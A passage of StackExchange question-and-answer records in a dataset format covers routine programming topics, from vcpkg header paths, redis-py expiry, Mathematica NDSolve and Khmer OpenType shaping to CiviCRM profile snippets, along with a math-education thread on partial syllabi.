And it provides convenient means to convert between the \"field\" types and the time_point types.\n\n<code>git clone https:\/\/github.com\/Microsoft\/vcpkg.git\ncd vcpkg\n.\/bootstrap-vcpkg.sh\n.\/vcpkg integrate install\nvcpkg install date\n<\/code>\nI followed the above instruction and now I have <code>\/home\/username\/vcpkg\/<\/code> with many other directories underneath it.\nI navigated to <code>\/home\/username\/vcpkg\/installed\/x64-linux\/include\/date<\/code> and found <code>date.h<\/code> and <code>tz.h<\/code>, which I were looking for.\nI'm trying to use them in a C++ project but I'm not sure how to tell the compiler where to find the header files. Should I cut\/copy paste <code>\/date<\/code> directory into <code>\/user\/include\/c++\/9<\/code>, or <code>\/usr\/local\/include<\/code>, or <code>\/usr\/local\/include\/x86_64-linux-gnu<\/code>? or should I do none of those? Am I supposed to define the path to the library in my files\/makefile somehow?\nThank you\nComment: I just throw header-only libraries directly in the source tree of the project that's using it. Failing that, `\/usr\/local\/include`.\nComment: What type of project is this? How do you build it?\nAnswer: You just need to pass VCPKG toolchain file to CMake:\n<code>cmake -B build -DCMAKE_TOOLCHAIN_FILE=~\/vcpkg\/scripts\/buildsystems\/vcpkg.cmake\ncmake --build build \n<\/code>\nPlease adjust DCMAKE_TOOLCHAIN_FILE to your VCPKG installation path.\nIf you would like to use VCPKG manifest mode (with file that describes all dependent libraries), just add one more parameter \"-DVCPKG_FEATURE_FLAGS=versions\":\n<code>cmake -B build -DCMAKE_TOOLCHAIN_FILE=~\/vcpkg\/scripts\/buildsystems\/vcpkg.cmake -DVCPKG_FEATURE_FLAGS=versions\ncmake --build build \n<\/code>\n","meta":{"source":"stackoverflow","title":"How\/Which directory to install a 3rd party C++ library on Ubuntu?","dup_signals":{}},"subset":"stackexchange"} +{"text":"dynamically change UIKeyboards return key\n\nQuestion: I have two UITextfield the user enters his name into the first and email into the second. I would like to know how to change the UIKeyboards return key depending if the name text field has an entry or not.\nFor instance if nametextfield is empty then I would like the UIkeyboard return key to be Next\nelse if the nametextfield has an entry in it then when the user selects the email text field I would like the return key to be submit.\nIs this possible? if so how would I go about accomplishing it? any help would be appreciated.\nAnswer: You can have return key customized to prefixed values that you can see in <code>UIReturnKeyType<\/code> enum for each <code>UITextField<\/code>.\n<code>textFieldName.returnKeyType = UIReturnKeyNext;\ntextFieldEmail.returnKeyType = UIReturnKeyDefault;\n<\/code>\nNot sure if this is what you're looking for though.\nComment: oh yup thats pretty much it, but I am not sure where to put this code?\nComment: for instance what method is called when you enter the uitextfield? or is there another place I can put it?\nComment: you usually put it in viewDidLoad of your view controller, but depends on your specific case (are your text fields fully created at that time or do you do it at a later stage, for example).\nComment: my textfields are created as soon as the app loads.. but its not till later that the user enteres a name and email.. the thing I am confused by is how do i decide what return button to show at viewdid load if i dont know if a name is entered untill the user enteres it.... 
I hope this makes sense.\nAnswer: You have a chance to set up keyboard characteristics in the UITextFieldDelegate Protocol method textFieldShouldBeginEditing: which is called before the text field becomes the first responder (indeed to decide if it may become the first responder). If you don't already have a delegate for the text field(s) in question you would have to assign one and implement at least that method. Presumably the same object handling the text field could hold the delegate methods. The following implementation sets the return key to \"Search\".\n<code>- (BOOL) textFieldShouldBeginEditing:(UITextField *)textField {\n NSLog(@\"textFieldShouldBeginEditing\");\n textField.returnKeyType = UIReturnKeySearch;\n return YES;\n}\n<\/code>\nYou'd have to look at the contents of your text fields to decide what value to use.\nAnswer: Make use of the textField.returnKeyType property. \nyou can check out all the available options here http:\/\/developer.apple.com\/library\/ios\/documentation\/uikit\/reference\/UITextInputTraits_Protocol\/Reference\/UITextInputTraits.html#\/\/apple_ref\/doc\/c_ref\/UIReturnKeyType\nAnswer: textfield.returnKeyType = UIReturnKeySearch;\n","meta":{"source":"stackoverflow","title":"dynamically change UIKeyboards return key","dup_signals":{}},"subset":"stackexchange"} +{"text":"SyntaxError: Unterminated string in JSON at position 52428390 when JSON.parse() result of google sheets api call\n\nQuestion: I'm building a Google Apps Script web app, and i need to retrieve data from a spreadsheet.\n<code>function testOther() {\n var spreadsheetId = \"spreadsheetID\";\n var range = \"'PERMISSIONS'!A1:G\";\n var token = ScriptApp.getOAuthToken();\n var url = \"https:\/\/sheets.googleapis.com\/v4\/spreadsheets\/\" + spreadsheetId + \"\/values\/\" + range + \"?majorDimension=ROWS&valueRenderOption=FORMULA\";\n\n var request = {\n method: \"get\",\n url: url,\n headers: { Authorization: \"Bearer \" + token },\n muteHttpExceptions: true,\n };\n var response = UrlFetchApp.fetch(url, request);\n var jsonResponse = JSON.parse(response.getContentText());\n}\n<\/code>\nThe result in string looks like this, and values can contain hundreds of thousands results:\n<code>{\n \"range\": \"PERMISSIONS!A1:G491462\",\n \"majorDimension\": \"ROWS\",\n \"values\": [\n [\n \"ID\",\n \"Title\",\n \"Type\",\n \"Email\",\n \"Role\",\n \"Inherit\",\n \"From\"\n ],\n [\n \"val1\",\n \"val1\",\n \"val1\",\n \"val1\",\n \"val1\",\n true,\n \"val1\"\n ],\n [\n \"val2\",\n \"val2\",\n \"val2\",\n \"val2\",\n \"val2\",\n true,\n \"val2\"\n ], \n ...\n]}\n<\/code>\nMy final goal is to have a variable that contains the value of the key \"values\". I'm facing this issue :\n\nSyntaxError: Unterminated string in JSON at position 52428390\n\nEDIT : the result is actually truncated, so the error message is relevant. There seems to be a limitation with the google spreashsheets api\nComment: I have to apologize for my poor English skill. Unfortunately, I cannot understand your expected values from `My final goal is to have a variable that contains the value of the key \"values\"`. In order to correctly understand your question, can you provide the sample output values you expect? By the way, from your error message, what is the total number of cells in your Google Spreadsheet? I'm worried that the number of cells might be large. 
First, I would like to correctly understand your question.\nComment: I can't help but think there might be a more suitable approach to your problem than attempting to JSON.parse a 52MB+ response\nComment: `UrlFetchApp.fetch(url, request)` returns a Promise. You cannot immediately call JSON.parse like that. Either convert the outermost function to `async function` and use `await` or use `response.then(res => JSON.parse(res.getContextText()))`\nComment: @ibrahimtanyalcin sorry but for the second solution i get ```TypeError: response.then is not a function```\nComment: @Tanaike I provided the sample of output i receive. The content of the key \"values\" in the response is what i want to add to a variable, but for the moment i can\"t parse the result as JSON\nComment: I didn't know what `UrlFetchApp` is. Documentation is [here](https:\/\/developers.google.com\/apps-script\/reference\/url-fetch\/http-response#getContentText(String)). Try doing `response.getContentText(\"UTF-8\")`\nComment: @ibrahimtanyalcin i think you didn't get my point. I do receive the result in string. My problem is that i can\"t parse it into JSON because it fails\nComment: I get your point, JSON.parse might not work either because the enconding is ASCII or else there is fauly encoding of a character like French characters etc. It is worth a try, read the docs.\nComment: @ibrahimtanyalcin i did ```Logger.log(JSON.parse(response.getContentText(\"UTF-8\")));``` and still same error unfortunately\nAnswer: Looked like there was a size limit with the api response, so it was returning a truncated response.\n","meta":{"source":"stackoverflow","title":"SyntaxError: Unterminated string in JSON at position 52428390 when JSON.parse() result of google sheets api call","dup_signals":{}},"subset":"stackexchange"} +{"text":"Should school syllabus include chapters partially?\n\nQuestion: In my locality, many schools have this tendency to partially include this and that chapter in the syllabus (for almost every subject). For example, (most of the chapters are subdivided in two or more parts), they will take chapter 2, chapter 3.1, chapter 5.1, .2, chapter 14 and make this as a syllabus for a term\/semester (out of 15 chapters, say). They complete the full textbook in a whole year, by the way.\nNow, the textbook is actually well organised, and a student would understand the topics better if the syllabus followed the order the book is written. The concept of syllabus selection committee is to 'mix hard and easy chapters (parts)' and 'to give different tastes'. In my opinion, the hard parts do not need more work once the prerequisite chapters are done; I mean if you go step by step through the text book, it is always the same amount of difficulty. And for the 'taste', if we keep tasting this and that food frequently, we do not get any taste at all.\nSo my question is: \n\nIs this normal in other places\/countries too? 
If so, how does this practice benefit the students in learning (mathematics)?\nComment: *if you go step by step through the text book, it is always the same amount of difficulty* --- As someone who mostly self-learned all of school algebra, precalculus, single and multivariable calculus, some linear algebra, and some differential equations by going step by step, partially or fully (mostly partially, until I found a book that worked for me), roughly 12 to 15 textbooks during my high school years, not to mention all the self-study I've done since ([recent example](https:\/\/math.stackexchange.com\/a\/141160\/13130)), I strongly disagree with your statement.\nComment: @Kawrno, are you sure of their motivations in how they split things? That sounds very odd. Many times textbooks are not organized the best way. I go out of order in Calculus, and in Precalculus, because I want the order to make sense, and the book's order doesn't. I'm sure it frustrates students sometimes. If I had the time to write a new calculus textbook, I think I would.\nComment: Personally, I am of the opinion that if you are going to use a book, then you should follow the topic outline of the book. If you don't like the order in which topics are laid out, find a different book (or write your own; or produce your own lecture notes; or, at the very least, regard the text as an \"optional\" resource and make it very clear that you aren't following it carefully). I suspect that this is an opinion shared by many, but I don't have the citations or experience to feel comfortable providing an answer.\nComment: In the ideal world \u2014 which happens to be the world that I was educated in \u2014 grade school textbooks are not 1000+ page bricks but sub-200 page books with large enough typeface, with well thought out sequencing of chapters, where each chapter has theoretical part, definitions, proofs, examples, and then a bunch of exercises. The complete book must be covered in a school year, first to last page, no omissions. Makes it easy for teachers, pupils and parents. College books are more of a mixed bag, and college profs tend to design their own courses, so selecting chapters is ok.\nComment: *Now, the textbook is actually well organised, and a student would understand the topics better if the syllabus followed the order the book is written.* Citation needed? Obviously not everyone agrees with this assertion, which is why they cover the syllabus in a different order.\nComment: @RustyCore In the context I grew up in, we didn't really use textbooks. We were taught material by our teachers, with books (definitely under 200 pages!) mostly providing practice questions, if used at all.\nComment: @JessicaB This is one of the flaws of the American school system where too much depends on a teacher \u2014 you never know what and how will be taught. This approach works for college, where profs create and refine their lectures. Richard Feynman created his course on computation in 1981, updated it over several years, had it taped in 1985; the book was printed in 1996. A good course ultimately becomes a book to reach a wider audience. This is what school books should be: carefully prepared, well-ordered essential material, that can be used for self-study no matter how incompetent a teacher is.\nComment: @RustyCore I beg to differ. This is one of the strengths of the UK system. Teaching is designed by people who know the students. 
Teachers don't get free reign over the content - that's set by the national curriculum - but the way it is taught is adapted by the school to suit the context. Reading straight from a textbook is not a good method of learning for most students.\nComment: @JessicaB Well, at lest in the U.K. you have national curriculum. No, I did not mean literally reading from the book, the book is a backup for missed days and bad teachers. I guess we are on the same page here.\nAnswer: My sense is that often authors are encouraged (required?) by publishers to make books very 'complete'. This means the book has all the topics that any instructor would be likely to want for a subject. However, it also means that books are often too big to entirely cover in a semester (or year). Thus an instructor must pick and choose chapters\/sections based on the goals\/objectives of their particular course. So depending on what is to be accomplished in the class, a certain amount of selection from the book is likely to occur, and may result in some topics in the book being skipped or being covered out of order.\nTo answer one of your specific questions, I don't think this particularly benefits students, except for perhaps giving them material for further self-study if the entire book didn't get covered during the course.\nAnswer: Yes they do so in many places, I think the point is that the students are forced to finish a certain curriculum (depends on the country ofcourse), for example when students finish the $9^{th}$ grade they must know this and this and that.\nSo in the years before the $9^{th}$ grade the teachers focus on what have to be finished and leave the other topics that are in the book either because they are not in the curriculum, or because they see that this topic is hard for students in this age so they explain it in the year after, and sadly there is another reason also, most teachers just ask the older teachers what they explain and in which order and do just the same just because the other teachers that used to teach before them do it.\nBut as a benefit for students, I think there isn't really any benfit, and that is why all around the world you see students and teachers, that wisely think about this issue, complaining about the curriculum and that it must be changed. \nI am not so sure about this, but I think the ministries of education put the curriculum right? So the question is, are there really qualified people in these ministries to specify what the Mathematics curriculum should and should not include? I don't think so myself, and I see that this is the problem.\nAnswer: I tend to see this in upper level college courses a lot. My impression is that the schools are trying to appear to have a solid course by using an iconic textbook (not often the best pedagogically). Often the course is too short to really cover the content properly. \nI don't like the practice. Prefer to spend more time or more realistically, use a book tailored for the course length. But I understand the psychological basis in having shorter courses using iconic, much too long texts. It's the normal human desire to look fancier than one is.\nAnswer: Also, realize that many authors write \"complete\" (self-contained) texts, and by their own recommendations, may suggest various ways an instructor may want to approach the subject. \nFor example, an author of a text with 13 chapters, may suggest, in the event that an instructor is focusing on foo, to focus on chapters 1 - 3, chapter 4 (sections 1-3), and chapters 7, 9, 10. 
Occasionally, an instructor may designate two or three chapters and their sections to be addressed by students in presentations, or in a semester paper, based on the foundation of the text that's covered in class.\nThis is a common practice in classes, because some texts cannot be thoroughly covered in one or two semesters.\n","meta":{"source":"matheducators.stackexchange","title":"Should school syllabus include chapters partially?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Magento credit card statement shows \"store id 1\"\n\nQuestion: I am using Magento with the netgains stripe module, everything is working fine. However when an order is processed the credit card statement shows the transaction as affiliated to \"store id 1\" how can i change this so the store name is displayed instead of this store id 1 information on the credit card statement\nThanks in advance\nAnswer: You may have figured out the answer to this now but if you haven't I can shed some light.\nIn app\/code\/local\/Netgains\/Stripe\/Model\/Stripe.php on Line 146 you'll see this:\n<code> $storeId = 'Store Id'.' '.Mage::app()->getStore()->getId();\n<\/code>\nYou can change 'Store Id' to the name of your site\/company and it will then show up on the customer's statement descriptor.\n","meta":{"source":"stackoverflow","title":"Magento credit card statement shows \"store id 1\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"redis-py pipeline hset not saving\n\nQuestion: I have set a <code>pipeline<\/code> on redis-py to save 2 diferent hashes\n<code>p = self.app.redis.pipeline()\nkey_id = '{}{}'.format(self.prefix,article.id)\nkey_url = '{}{}'.format(self.prefix,article.url)\n\n# add the common fields from the ArticleModel\np.hset(key_id, 'shortUrl', shortUrl)\np.hset(key_url,'shortUrl', shortUrl)\nfor k in article.__table__.columns:\n k = k.name\n if k not in ['url','id']:\n p.hset(key_id, k, article.__getattribute__(k))\n p.hset(key_url, k, article.__getattribute__(k))\n\n# add the different fields and finish the transaction\np.hset(key_id, 'url', article.url)\np.hset(key_url, 'id', article.id)\np.expireat(key_id, self.expiration_window)\np.expireat(key_url, self.expiration_window)\np.execute()\n<\/code>\nThe pipeline before executing is:\n<code>[(('HSET', 'article\/1', 'shortUrl', 'qp'), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'shortUrl', 'qp'), {}), (('HSET', 'article\/1', 'title', u'Full pytest documentation'), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'title', u'Full pytest documentation'), {}), (('HSET', 'article\/1', 'authors', u''), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'authors', u''), {}), (('HSET', 'article\/1', 'html', u'<p>Enter search terms or a module, class or function name.<\/p>\\n'), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'html', u'<p>Enter search terms or a module, class or function name.<\/p>\\n'), {}), (('HSET', 'article\/1', 'plaintext', u'Enter search terms or a module, class or function name. '), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'plaintext', u'Enter search terms or a module, class or function name. 
'), {}), (('HSET', 'article\/1', 'markdown', u'Enter search terms or a module, class or function name.\\n\\n'), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'markdown', u'Enter search terms or a module, class or function name.\\n\\n'), {}), (('HSET', 'article\/1', 'date', datetime.datetime(2014, 12, 5, 19, 2, 30, 752183)), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'date', datetime.datetime(2014, 12, 5, 19, 2, 30, 752183)), {}), (('HSET', 'article\/1', 'url', u'http:\/\/pytest.org\/latest\/contents.html'), {}), (('HSET', 'article\/http:\/\/pytest.org\/latest\/contents.html', 'id', 1), {}), (('EXPIREAT', 'article\/1', 604800), {}), (('EXPIREAT', 'article\/http:\/\/pytest.org\/latest\/contents.html', 604800), {})]\n<\/code>\nAnd the answer is:\n<code>[1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, 1L, True, True]\n<\/code>\nSo it seems that it is saving the 16 keys.\nWhen executing <code>self.app.redis.keys('*')<\/code> it does not bring any key nor when executing <code>self.app.redis.hget('article\/1')<\/code>\nAny thing I am missing?\nAnswer: Found the problem\nbasically it was the expiration window that was only considering 7 days, but not from now. It was from the beginning of the time, around 1970...\n","meta":{"source":"stackoverflow","title":"redis-py pipeline hset not saving","dup_signals":{}},"subset":"stackexchange"} +{"text":"Swift ios 10 NavBar Item keeps growing\n\nQuestion: I have a navBar Controller connected to a UIView, I have a right bar button item that is a chevron. I have programmatically created a search bar. If you click the chevron about 20-100 times it keeps growing until it is off the screen. I can see each time I click the chevron a slight bump in my search bar. Since you can not place constraints on navBar and fixed Space bar button item does not work either. Any suggestions on where to look or how to fix this?\n<code>func rotateChevron(animated: Bool = true) {\n let chevAnimate = animated ? 0.3 : 0.0\n let chevIsDown = messagePicker.frame.origin.y == self.view.frame.height - (tabBarController?.tabBar.frame.height ?? 0)\n let rotation: CGFloat = chevIsDown ? 0.0 : 180.001\n UIView.animate(withDuration: chevAnimate, animations: {\n self.filterChevron.customView?.transform = CGAffineTransform(rotationAngle: rotation.degreesToRadians)\n }, completion: nil)\n}\n<\/code>\nAnswer: After some research I placed within the animation blocks a forced CGSize (w\/h) and this seems to have solved the issue. I also found that transform animation should not be used with frames because it moved the bounds of the image each time which is why the chevron was acting up.\n<code>func rotateChevron(animated: Bool = true) {\n let chevAnimate = animated ? 0.3 : 0.0\n let chevIsDown = messagePicker.frame.origin.y == self.view.frame.height - (tabBarController?.tabBar.frame.height ?? 0)\n let rotation: CGFloat = chevIsDown ? 
0.0 : 180.001\n filterChevron.customView?.frame.size = CGSize(width: 35, height: 30)\n UIView.animate(withDuration: chevAnimate, animations: {\n self.filterChevron.customView?.transform = CGAffineTransform(rotationAngle: rotation.degreesToRadians)\n }, completion: nil)\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Swift ios 10 NavBar Item keeps growing","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to implement two months calendar using android\n\nQuestion: \nI want to implement two month calendar in my android application like below image,\n\ni tried to get by googling but cant get any source code for two months calendar,Pls give source code for two months calendar if any... Awaiting for your replies...\nAnswer: \nIt is possible to implement two months calendar using the grid view. The main advantage of the grid view is , it having autoscroll property default.So try to use gridview on your android xml. Refer code below,\n\n<code><GridView\n android:id=\"@+id\/calendar\"\n android:numColumns=\"7\" \n android:layout_width=\"fill_parent\"\n android:layout_height=\"wrap_content\">\n<\/GridView>\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to implement two months calendar using android","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to use answer of NDSolve in NIntegrate\n\nQuestion: <code>a = 3; Tau = 100; T0 = 1\/2; g0 = Tanh[2\/T0];\nz0 = (1 - g0) Tau;\ns = NDSolve[{D[G[q, x], x] + (2 z0 (1 - x)^a + q^2) G[q, x] == \nSqrt[2\/Pi] q, G[0, x] == 0, G[10, x] == 0.0795932, G[q, 0] == 0.797885 q\/(q^2 + 2 z0)}, G[q, x], {q, 0, 10}, {x, 0, 1}, AccuracyGoal -> 20]\n Plot[(G[q, x]) \/. s \/. q -> 0.5, {x, 0, 1}]\nP[y_, x_] := Sqrt[2\/Pi] NIntegrate[Sin[q y]*G[q, x], {q, 0, 10}, AccuracyGoal -> 20]\n<\/code>\nHere, I want to use the G[q,x] from the NDSolve, as solution in the NIntegrate code of P[y,x]. But I am not able to understand how to call it. This code is working till Plot of G[q,x]. But P[y,x] is giving a lot of errors.\nComment: For example, use `G` in `NDSolve`. `a = 3; Tau = 100; T0 = 1\/2; g0 = Tanh[2\/T0];\nz0 = (1 - g0) Tau;\nsol = NDSolve[{D[G[q, x], x] + (2 z0 (1 - x)^a + q^2) G[q, x] == \n Sqrt[2\/Pi] q, G[0, x] == 0, G[10, x] == 0.0795932, \n G[q, 0] == 0.797885 q\/(q^2 + 2 z0)}, G, {q, 0, 10}, {x, 0, 1}, \n AccuracyGoal -> 20]; \nP[y_, x_] := \n Sqrt[2\/Pi] NIntegrate[Sin[q y]*G[q, x] \/. 
sol[[1]], {q, 0, 10}, \n AccuracyGoal -> 20]; P[3, 2]`\nComment: It works, thank you so much\nAnswer: Try and see if this works for you.\nBtw, you are also getting\n<code> NDSolveValue::ibcinc: Warning: boundary and initial conditions are inconsistent.\n<\/code>\nwhich you might want to fix.\n<code>ClearAll[\"Global`*\"]\na = 3; Tau = 100; T0 = 1\/2; g0 = Tanh[2\/T0];\nz0 = (1 - g0) Tau;\nsolG = NDSolveValue[{D[G[q, x], x] + (2 z0 (1 - x)^a + q^2) G[q, x] == \n Sqrt[2\/Pi] q, G[0, x] == 0, G[10, x] == 0.0795932, \n G[q, 0] == 0.797885 q\/(q^2 + 2 z0)}, G, {q, 0, 10}, {x, 0, 1}, \n AccuracyGoal -> 20]\n\nPlot[solG[0.5, x], {x, 0, 1}]\n<\/code>\n\n<code>P[y_, x_] := Sqrt[2\/Pi] NIntegrate[Sin[q y]*solG[q, x], {q, 0, 10},AccuracyGoal -> 20]\n<\/code>\nand now\n<code> P[1, 2]\n<\/code>\n\n<code>Plot[P[2, x], {x, 0, 1}]\n<\/code>\n\nI also think it will be better\/safer to define your <code>P<\/code> as\n<code>P[y_?NumericQ, x_?NumericQ]\n<\/code>\nSince <code>y,x<\/code> could only be numerical for things to work, because you are using <code>NIntegrate<\/code>.\n","meta":{"source":"mathematica.stackexchange","title":"How to use answer of NDSolve in NIntegrate","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why won't my Android SDK Manager show up when invoked from Eclipse?\n\nQuestion: On Ubuntu 12.04, I'm running the Eclipse IDE with the standalone Android SDK plugins installed. I'm using it this way instead of using the ADT Bundle because I'm also using Eclipse for other code.\nIf I try to invoke the Android SDK Manager from the Eclipse Window menu, then I get the happy message about \"SDK Manager will show up shortly...\", but when that status window goes away, the SDK Manager has not, in fact, started.\nI do have a workaround, for now. If I open a terminal window and invoke the tool directly...\n<code>>> \/opt\/android-sdk-linux\/tools\/android\n<\/code>\nThe SDK manager happily opens. No errors are returned. Changes to the Android SDK environment made here persist and function as expected. While this works, it's strange and spooky; I'd rather have it also work within the IDE.\nAs a nicer workaround, I tried constructing a Gnome <code>.desktop<\/code> file to invoke the executable directly, but when I try to use that, nothing happens, and no errors are visible.\nEven stranger, the Android Virtual Device Manager works just fine when invoked from within Eclipse. Only the SDK Manager is affected by this...whatever it is.\nI have seen elsewhere that the Android tools might require Java 6, but I can't change Eclipse's Java path in <code>eclipse.ini<\/code> without also clobbering use of Java 7 in the rest of Eclipse, so this doesn't seem like a viable option.\nWhat else can I try, or what am I missing, that would make the SDK Manager behave in Eclipse?\nAnd before I get flagged as a duplicate of the following questions, I've already read them and tried some things without success:\n\nAndroid sdk manager not showing up ( Ubuntu )\n\nI already installed the official Oracle JDKs and don't want to mess with installing the OpenJDK again and dealing with conflicts, etc.\n\nhttps:\/\/askubuntu.com\/questions\/386392\/problem-in-opening-sdk-manager-in-eclipse\n\nAll my paths are set correctly, and I don't get any errors when invoking from the terminal.\n\nAndroid SDK manager not opening\n\nI don't get an error message on the terminal.\nComment: what is the output of `ls -l \/opt\/android-sdk-linux\/tools\/android.\n`\nAnswer: Welp, just found a solution. Or maybe it's just another workaround. 
Whatever.\n<code>>> cd \/usr\/bin\/\n>> sudo ln -s \/opt\/android-sdk-linux\/tools\/android android\n>> which android\n\/usr\/bin\/android\n<\/code>\nThe fact that this works suggests that, even if the <code>tools<\/code> directory is properly within my path, Eclipse can't find it unless it's also in <code>\/usr\/bin\/<\/code>. Strange. Oh, well.\n","meta":{"source":"askubuntu","title":"Why won't my Android SDK Manager show up when invoked from Eclipse?","dup_signals":{}},"subset":"stackexchange"} +{"text":"OpenType - Two Khmer chars become three before mapping to glyph Ids\n\nQuestion: I have an interesting problem with processing Khmer text.\nThe text \"\u1780\u17be\" is a string of length two in Unicode. See snipped below for the char codes.\n\n<code>let textbox = document.getElementById('textbox');\nlet info = document.getElementById('info');\n\nlet text = \"\u1780\u17be\"\n\ntextbox.setAttribute('value', text);\n\ninfo.innerHTML = \"length: \" + text.length + \"<br>codes: \" + text.split('').map(c => c.charCodeAt(0))<\/code>\n<code><input id=\"textbox\" type=\"text\" style=\"font-size:80px; width: 2em;\"\/>\n<div id=\"info\"><\/div><\/code>\n\nText renderers seem to compose this text of three glyphs, or replace the three characters with ligatures. So far this is exotic but not unexpected.\nHere is the puzzling thing: When I type this text into the Crowbar text shaping debugger at http:\/\/www.corvelsoftware.co.uk\/crowbar\/ using the Khmer font from Google Fonts, one can see that the two characters are mapped to three glyphs. But the two characters seem to become three characters even before the mapping. Character 6081 appears out of thin air.\n\nI took a deep dive into the internals of the font file, and there is only one subtable in the <code>cmap<\/code> table, which maps character codes to glpyh ids. This table has format 4, which is pretty standard and only allows one-to-one mappings, so there is no additional glyph inserted during <code>cmap<\/code> processing.\nAlso, if only the two original char codes are mapped to glyphs, the resulting text will look different, so the third character seems to be necessary.\nWhat step am I missing here that adds the third character before the character to glyph id mapping? There seems to be some preprocessing of the text taking place that I am not aware of.\nComment: You should check shaping engines, e.g. https:\/\/harfbuzz.github.io\/ (there are few other: one of Microsoft, one of Mac and SIL). These translate strings (and font information) in position and glyphs. It is a complex topic, which I have not yet mastered.\nComment: This seems to be a science on its own. Here is an article describing in detail how Khmer fonts are created: https:\/\/learn.microsoft.com\/en-us\/typography\/script-development\/khmer\nTHere is actually some preprocessing going on, such as adding a character before vowels.\nComment: I do not know all the details, but stage 1 is to normalize a string. Unicode code point have different normalization. It is very probable that they just do a decomposition, because it is much better to deal diacritics separately (they follow other rules)\nComment: @GiacomoCatenazzi Thanks, i will look into this. There is a Javascript normalize() function for strings. 
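For example, something along these lines (just a quick, untested sketch) dumps the code points after each Unicode normalization form, so I can see whether any of them splits the vowel:\n<code>const s = '\u1780\u17be';\nfor (const form of ['NFC', 'NFD', 'NFKC', 'NFKD']) {\n  \/\/ list the code points (hex) left after applying this normalization form\n  const codes = [...s.normalize(form)].map(c => c.codePointAt(0).toString(16));\n  console.log(form, codes.join(' '));\n}\n<\/code>\n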
But so far I could not make do what I was hoping for.\nComment: I'd also recommend asking this over on https:\/\/typedrawers.com, instead, since that's where all the font folks hang out.\nComment: You might wrote using wrong vowel:\n\u1780\u17be and \u1780\u17c1\u17b8 these two are different\nAnswer: As @Waruyama suggested, the answer is documented in https:\/\/learn.microsoft.com\/en-us\/typography\/script-development\/khmer. It is buried in the entry for 'Vowel' in the glossary there, and says\n\nThe shaping engine will take care of pre-pending the syllable, with the glyph piece shaped like U+17C1.\n\nBy 'syllable', the specification means the first part of these vowels, which has the same shape as U+17C1 KHMER VOWEL SIGN E. Therefore HarfBuzz expands the input string from <U+1780, U+17BE> to <U+1780, U+17C1, U+17BE>. At this point, the font has been consulted only to confirm that it has GSUB instructions for the Khmer script. Next, it applies the cmap table from the font.\nAnswer: You might wrote using wrong vowel:\n<code>\u1780\u17be (U+1780U+17BE)<\/code> and <code>\u1780\u17c1\u17b8 (U+1780U+17C1U+17B8)<\/code> : these two are different.\nAs if using wrong key of vowel, the glyph still appear as the same but they are constructed from different key.\nTry with this https:\/\/r12a.github.io\/app-conversion\/\n","meta":{"source":"stackoverflow","title":"OpenType - Two Khmer chars become three before mapping to glyph Ids","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why does the html snippet for a profile not include the url of the site for linked Jscript and css files?\n\nQuestion: When our users create an html snippet for a Profile, it requires a lot of editing to get the references to work. I don't understand why it's written that way.\nFor reference, here's a snippet of the code for a form that just has first name, last name and email address.\n<code><script type=\"text\/javascript\">\nvar CRM = {\"config\":{\"ajaxPopupsEnabled\":true,\"isFrontend\":\"\"}};\n<\/script> \n<script type=\"text\/javascript\" src=\"\/sites\/all\/modules\/civicrm\/packages\/jquery\/jquery-1.11.1.min.js?r=ogWA8\">\n<\/script> \n<script type=\"text\/javascript\" src=\"\/sites\/all\/modules\/civicrm\/packages\/jquery\/jquery-ui\/jquery-ui.min.js?r=ogWA8\">\n<\/script> \n<script type=\"text\/javascript\" src=\"\/sites\/all\/modules\/civicrm\/packages\/backbone\/lodash.compat.min.js?r=ogWA8\">\n<\/script> \n<script type=\"text\/javascript\" src=\"\/sites\/all\/modules\/civicrm\/packages\/jquery\/plugins\/jquery.mousewheel.min.js?r=ogWA8\">\n<\/script> \n<\/code>\nThese snippets are used on different websites than the one where CiviCRM is installed, so the local (non-absolute URL) <code>src=\"\/sites\/all\/...<\/code> references don't work correctly. \nNOTE: The Help text does indicate that this snippet should work on \"ANY website\":\nComment: Hi mark, Could you edit the question to format the code properly? quite hard to read now\nComment: It is indented - I revised it after Xavier asked that I \"format the code properly\" But the issues that you and Xavier are having with reading the code is indication of the difficulty that our end users have trying to work with the html snippet. If the experts can't read it, it presents a problem. The specific question I have with it is that all the url references are indirect. 
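To make that concrete: before the snippet works on a remote site, every one of those references has to be hand-edited into an absolute URL, e.g. something like the following (the domain here is just a placeholder for wherever CiviCRM happens to be installed):\n<code><script type=\"text\/javascript\" src=\"https:\/\/crm.example.org\/sites\/all\/modules\/civicrm\/packages\/jquery\/jquery-1.11.1.min.js?r=ogWA8\">\n<\/script> \n<\/code>\n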
I don't see what that has to do with the formatting of the text in this question.\nComment: @PTP Mark: Please indent your code so that users can see it.\nAnswer: I found this deep in the recesses of Jira: Standalone Form HTML for Profiles has relative URL. So it was fixed back in 3.0 but must have reverted at some point. As best I can follow, Resources.php builds this via addScriptFile, which calls addScriptUrl, which calls getUrl, which creates the URL by running through the extension manager (CRM\/Extension\/system.php). I'm not sure of the \"correct\" place to add the base URL and fix this, but I'm guessing it's in the extension manager system file.\nComment: I think it's a similar issue, but slightly different. I think the form action is correctly absolute at the moment (which the bug fix you reference took care of), but all the javascript declarations are not.\nAnswer: we found that if we changed the references from \"src=\"\/sites\/all\/modules\/civicrm [...] to a complete url, it would work. An alternative solution seems to be to strip out all references to civicrm and just implement it using a form field.\nComment: Are you inserting these snippets on a different URL? Why do you need to specify the full URL? Where are you pasting the snippets?\nComment: yes, we are. the profile collects information from a non-civicrm site - the user's web site is often hosted elsewhere.\nComment: Ah ha. I've never used the Profile HTML Snippet in that way, but the help text does indicate it should be possible. I edited the question to try to make the issue clearer.\nAnswer: Check this issue in the bug tracker for some background and 